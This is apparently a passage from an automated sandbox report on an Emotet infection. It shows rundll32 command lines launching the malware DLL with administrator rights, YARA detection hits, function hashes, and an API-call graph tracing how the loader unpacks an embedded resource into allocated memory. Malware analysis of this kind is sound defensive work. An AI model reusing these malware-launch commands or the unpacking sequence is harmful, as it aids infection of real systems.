                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:18
                                                                                                                    Start time:21:09:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
                                                                                                                    Imagebase:0xd80000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    General

                                                                                                                    Target ID:19
                                                                                                                    Start time:21:09:23
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Executed Functions

                                                                                                                      Function 02941CCD Relevance: .4, Instructions: 429COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429831680.0000000002941000.00000010.00000800.00020000.00000000.sdmp, Offset: 02941000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_2940000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction ID: 072b12390161f50a2c8e14c31dd4fadd4b7c1c949fcc08799806ff72b3f7b73f
                                                                                                                      • Opcode Fuzzy Hash: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction Fuzzy Hash: 88D1E130A18A884FDB99DB2C8454B21BBE1FF5D344B1545AFE88ECB292DB24CCD1C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 02941CCD Relevance: .4, Instructions: 429COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429831680.0000000002941000.00000010.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.429801070.0000000002940000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_2940000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction ID: 072b12390161f50a2c8e14c31dd4fadd4b7c1c949fcc08799806ff72b3f7b73f
                                                                                                                      • Opcode Fuzzy Hash: 9c15aa56f9678e8a858ab685516818890a9203bed9a460f496a84efc4e36383a
                                                                                                                      • Instruction Fuzzy Hash: 88D1E130A18A884FDB99DB2C8454B21BBE1FF5D344B1545AFE88ECB292DB24CCD1C795
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F61 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F49 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 026B0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.429854363.00000000026B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_26b0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction ID: b7d806413e045fd06e5be263f9af9e118532006051a8a7e917b6ef14429d20c3
                                                                                                                      • Opcode Fuzzy Hash: 93676615be89c1c22470ac2f9ff6bfdc3a73a6823f9479d11cd7d2951573c6f8
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Executed Functions

                                                                                                                      Function 000007FF00260A21 Relevance: .3, Instructions: 318COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.693356513.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f6c842b845f843040c3a0925dfa7de87ce9f089b85ec76e48d9cd026da73950
                                                                                                                      • Instruction ID: 974a8992a35ad52dc6ce25e48a90bc15325f6a04411e8210db8ea1a9e0ec032f
                                                                                                                      • Opcode Fuzzy Hash: 8f6c842b845f843040c3a0925dfa7de87ce9f089b85ec76e48d9cd026da73950
                                                                                                                      • Instruction Fuzzy Hash: 9C715651A0EBC60FE71357786C697A17FB09F17214F0E40EBE488CB0E3E9485999C362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 000007FF002608A5 Relevance: .2, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.693356513.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8aa5b39e9cf500a71262fcc827fccf86c7c974b78088cfac4d249e7117e301cf
                                                                                                                      • Instruction ID: 6ed36d20e3ccc461d622a76460f1e24c217b6e3d811dd9bcbe74433d83e788d7
                                                                                                                      • Opcode Fuzzy Hash: 8aa5b39e9cf500a71262fcc827fccf86c7c974b78088cfac4d249e7117e301cf
                                                                                                                      • Instruction Fuzzy Hash: FE410E6194E7C24FE713977858A96A07FB19F53210B1E04EBD088CF0E3E94C999AD362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23
                                                                                                                      execution_graph 31784 10035042 TlsGetValue 31785 10035076 GetModuleHandleA 31784->31785 31786 10035055 31784->31786 31788 10035085 GetProcAddress 31785->31788 31789 1003509f 31785->31789 31786->31785 31787 1003505f TlsGetValue 31786->31787 31791 1003506a 31787->31791 31790 1003506e 31788->31790 31790->31789 31792 10035095 RtlEncodePointer 31790->31792 31791->31785 31791->31790 31792->31789 31793 10020c26 31795 10020c32 __EH_prolog3 31793->31795 31794 10020c80 31820 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31794->31820 31795->31794 31804 1002083b EnterCriticalSection 31795->31804 31818 100201f1 RaiseException __CxxThrowException@8 31795->31818 31819 1002094b TlsAlloc InitializeCriticalSection 31795->31819 31800 10020c8d 31801 10020c93 31800->31801 31802 10020ca6 ~_Task_impl 31800->31802 31821 100209ed 88 API calls 4 library calls 31801->31821 31805 1002085a 31804->31805 31806 10020916 _memset 31805->31806 31808 10020893 31805->31808 31809 100208a8 GlobalHandle GlobalUnlock 31805->31809 31807 1002092a LeaveCriticalSection 31806->31807 31807->31795 31822 10014460 31808->31822 31811 10014460 ctype 80 API calls 31809->31811 31813 100208c5 GlobalReAlloc 31811->31813 31814 100208cf 31813->31814 31815 100208f7 GlobalLock 31814->31815 31816 100208da GlobalHandle GlobalLock 31814->31816 31817 100208e8 LeaveCriticalSection 31814->31817 31815->31806 31816->31817 31817->31815 31819->31795 31820->31800 31821->31802 31823 10014477 ctype 31822->31823 31824 1001448c GlobalAlloc 31823->31824 31826 10013ba0 80 API calls ctype 31823->31826 31824->31814 31826->31824 31827 10030d06 31828 10030d12 31827->31828 31829 10030d0d 31827->31829 31833 10030c10 31828->31833 31845 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31829->31845 31832 10030d23 31834 10030c1c ___DllMainCRTStartup 31833->31834 31835 10030cb9 ___DllMainCRTStartup 31834->31835 31839 10030c69 31834->31839 31846 10030a37 31834->31846 31835->31832 31839->31835 31900 100125c0 31839->31900 31840 10030c99 31840->31835 31841 10030a37 __CRT_INIT@12 165 API calls 31840->31841 31841->31835 31842 100125c0 ___DllMainCRTStartup 146 API calls 31843 10030c90 31842->31843 31844 10030a37 __CRT_INIT@12 165 API calls 31843->31844 31844->31840 31845->31828 31847 10030b61 31846->31847 31848 10030a4a GetProcessHeap HeapAlloc 31846->31848 31850 10030b67 31847->31850 31851 10030b9c 31847->31851 31849 10030a6e GetVersionExA 31848->31849 31865 10030a67 31848->31865 31852 10030a89 GetProcessHeap HeapFree 31849->31852 31853 10030a7e GetProcessHeap HeapFree 31849->31853 31858 10030b86 31850->31858 31850->31865 31948 100310be 67 API calls _doexit 31850->31948 31854 10030ba1 31851->31854 31855 10030bfa 31851->31855 31856 10030ab5 31852->31856 31853->31865 31932 10035135 6 API calls __decode_pointer 31854->31932 31855->31865 31967 10035425 79 API calls 2 library calls 31855->31967 31922 10036624 HeapCreate 31856->31922 31858->31865 31949 100389ee 68 API calls ___wtomb_environ 31858->31949 31859 10030ba6 31933 10035840 31859->31933 31865->31839 31866 10030aeb 31866->31865 31869 10030af4 31866->31869 31867 10030b90 31950 10035178 70 API calls 2 library calls 31867->31950 31939 1003548e 78 API calls 7 library calls 31869->31939 31871 10030bbe 31952 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31871->31952 31873 10030af9 __RTC_Initialize 31879 10030b0c GetCommandLineA 31873->31879 31893 10030afd 31873->31893 31874 10030b95 31951 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31874->31951 31876 10030bd0 31880 10030bd7 31876->31880 31881 10030bee 31876->31881 31941 10038d66 77 API calls 3 library calls 31879->31941 31953 100351b5 67 API calls 4 library calls 31880->31953 31954 1002fa69 31881->31954 31885 10030b1c 31942 100387ae 72 API calls 3 library calls 31885->31942 31886 10030bde GetCurrentThreadId 31886->31865 31888 10030b26 31889 10030b2a 31888->31889 31944 10038cad 111 API calls 3 library calls 31888->31944 31943 10035178 70 API calls 2 library calls 31889->31943 31892 10030b36 31894 10030b4a 31892->31894 31945 10038a3a 110 API calls 6 library calls 31892->31945 31940 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31893->31940 31899 10030b02 31894->31899 31947 100389ee 68 API calls ___wtomb_environ 31894->31947 31897 10030b3f 31897->31894 31946 10030f4d 75 API calls 3 library calls 31897->31946 31899->31865 31993 10006a90 31900->31993 31903 1001265a 32027 1002fe65 105 API calls 8 library calls 31903->32027 31904 1001261c FindResourceW LoadResource SizeofResource 31907 10006a90 ___DllMainCRTStartup 67 API calls 31904->31907 31910 10012744 ___DllMainCRTStartup 31907->31910 31909 1001284d 31909->31840 31909->31842 31911 100127b7 VirtualAlloc 31910->31911 31912 1001279b VirtualAllocExNuma 31910->31912 31913 100127da 31911->31913 31912->31913 31998 1002fb00 31913->31998 31917 100127fa 32021 10002970 31917->32021 31919 10012810 ___DllMainCRTStartup 32024 100026a0 31919->32024 31921 10012664 32028 1002f81e 5 API calls __invoke_watson 31921->32028 31923 10036647 31922->31923 31924 10036644 31922->31924 31968 100365c9 67 API calls 3 library calls 31923->31968 31924->31866 31926 1003664c 31927 10036656 31926->31927 31928 1003667a 31926->31928 31969 10035aca HeapAlloc 31927->31969 31928->31866 31930 10036660 31930->31928 31931 10036665 HeapDestroy 31930->31931 31931->31924 31932->31859 31934 10035844 31933->31934 31936 10030bb2 31934->31936 31937 10035864 Sleep 31934->31937 31970 10030678 31934->31970 31936->31865 31936->31871 31938 10035879 31937->31938 31938->31934 31938->31936 31939->31873 31940->31899 31941->31885 31942->31888 31943->31893 31944->31892 31945->31897 31946->31894 31947->31889 31948->31858 31949->31867 31950->31874 31951->31865 31952->31876 31953->31886 31955 1002fa75 ___DllMainCRTStartup 31954->31955 31963 1002faee _realloc ___DllMainCRTStartup 31955->31963 31966 1002fab4 31955->31966 31989 10035a99 67 API calls 2 library calls 31955->31989 31956 1002fac9 HeapFree 31958 1002fadb 31956->31958 31956->31963 31992 100311f4 67 API calls __getptd_noexit 31958->31992 31960 1002fae0 GetLastError 31960->31963 31961 1002faa6 31991 1002fabf LeaveCriticalSection _doexit 31961->31991 31962 1002fa8c ___sbh_find_block 31962->31961 31990 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 31962->31990 31963->31899 31966->31956 31966->31963 31967->31865 31968->31926 31969->31930 31971 10030684 ___DllMainCRTStartup 31970->31971 31972 1003069c 31971->31972 31982 100306bb _memset 31971->31982 31983 100311f4 67 API calls __getptd_noexit 31972->31983 31974 100306a1 31984 10037753 4 API calls 2 library calls 31974->31984 31975 100306b1 ___DllMainCRTStartup 31975->31934 31977 1003072d RtlAllocateHeap 31977->31982 31982->31975 31982->31977 31985 10035a99 67 API calls 2 library calls 31982->31985 31986 100362e6 5 API calls 2 library calls 31982->31986 31987 10030774 LeaveCriticalSection _doexit 31982->31987 31988 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31982->31988 31983->31974 31985->31982 31986->31982 31987->31982 31988->31982 31989->31962 31990->31961 31991->31966 31992->31960 31994 1002f9a6 _malloc 67 API calls 31993->31994 31996 10006aa1 31994->31996 31995 10006aad 31995->31903 31995->31904 31996->31995 31997 1002fa69 ___wtomb_environ 67 API calls 31996->31997 31997->31995 31999 1002fb18 31998->31999 32000 1002fb3f __VEC_memcpy 31999->32000 32001 100127eb 31999->32001 32000->32001 32002 1002f9a6 32001->32002 32003 1002fa53 32002->32003 32014 1002f9b4 32002->32014 32036 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32003->32036 32005 1002fa59 32037 100311f4 67 API calls __getptd_noexit 32005->32037 32008 1002fa5f 32008->31917 32011 1002fa17 RtlAllocateHeap 32011->32014 32012 1002f9c9 32012->32014 32029 10036892 67 API calls __NMSG_WRITE 32012->32029 32030 100366f2 67 API calls 6 library calls 32012->32030 32031 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32012->32031 32014->32011 32014->32012 32015 1002fa4a 32014->32015 32016 1002fa3e 32014->32016 32019 1002fa3c 32014->32019 32032 1002f957 67 API calls 4 library calls 32014->32032 32033 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32014->32033 32015->31917 32034 100311f4 67 API calls __getptd_noexit 32016->32034 32035 100311f4 67 API calls __getptd_noexit 32019->32035 32022 1002f9a6 _malloc 67 API calls 32021->32022 32023 10002990 32022->32023 32023->31919 32038 10002280 32024->32038 32027->31921 32028->31909 32029->32012 32030->32012 32032->32014 32033->32014 32034->32019 32035->32015 32036->32005 32037->32008 32075 10001990 32038->32075 32041 